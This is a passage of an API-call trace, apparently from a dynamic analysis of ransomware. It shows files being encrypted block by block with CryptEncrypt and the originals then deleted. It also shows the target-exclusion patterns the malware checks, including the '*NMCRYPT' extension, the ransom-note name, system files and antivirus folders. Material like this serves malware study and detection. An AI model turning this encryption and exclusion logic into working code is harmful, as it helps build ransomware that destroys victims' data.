pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.095] GetLastError () returned 0x0 [0163.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.095] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.095] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.095] GetLastError () returned 0x0 [0163.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.095] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.095] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.095] GetLastError () returned 0x0 [0163.095] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.095] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.096] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.096] GetLastError () returned 0x0 [0163.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.096] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.096] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.096] GetLastError () returned 0x0 [0163.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.096] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.096] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.096] GetLastError () returned 0x0 [0163.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.096] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.096] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.096] GetLastError () returned 0x0 [0163.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.096] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x3f, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x3f, lpOverlapped=0x0) returned 1 [0163.096] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x3f, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x40) returned 1 [0163.096] GetLastError () returned 0x0 [0163.096] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x40, lpOverlapped=0x0) returned 1 [0163.097] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.097] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.097] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0x20 [0163.098] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", dwFileAttributes=0x20) returned 0 [0163.098] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned 1 [0163.098] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg")) returned 0 [0163.098] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" [0163.098] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.098] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF085.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf085.tmp")) returned 0xf085 [0163.099] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF085.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf085.tmp"), dwFlags=0x1) returned 0 [0163.099] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF085.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf085.tmp")) returned 1 [0163.100] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0163.100] wcslen (_String="OK") returned 0x2 [0163.100] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.100] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.100] CryptDestroyKey (hKey=0x9ad338) returned 1 [0163.100] CryptDestroyHash (hHash=0x9ad278) returned 1 [0163.100] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0163.100] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*NMCRYPT") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*Recovers your files.html") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.exe") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.dll") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.lnk") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.bat") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.ini") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.msi") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*.scf") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*pagefile.sys*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*NTUSER.DAT*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*AppData*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\winrar\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\java\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\TeamViewer\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\windows\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\ESET\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\AVG\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\AVIRA\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*\\AVAST Software\\*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*Atheros*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*Realtek*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*bootmgr*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*boot*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*boot*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*CONFIG.SYS*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*IO.SYS*") returned 0 [0163.100] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*MSDOS.SYS*") returned 0 [0163.101] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*NTDETECT.COM*") returned 0 [0163.101] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*ntldr*") returned 0 [0163.101] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*chrome*") returned 0 [0163.101] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*opera*") returned 0 [0163.101] PathMatchSpecW (pszFile="Genko_1.emf", pszSpec="*firefox*") returned 0 [0163.101] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Genko_1.emf", pszSpec="*") returned 1 [0163.101] strlen (_Str="NMoreira") returned 0x8 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.101] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.102] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 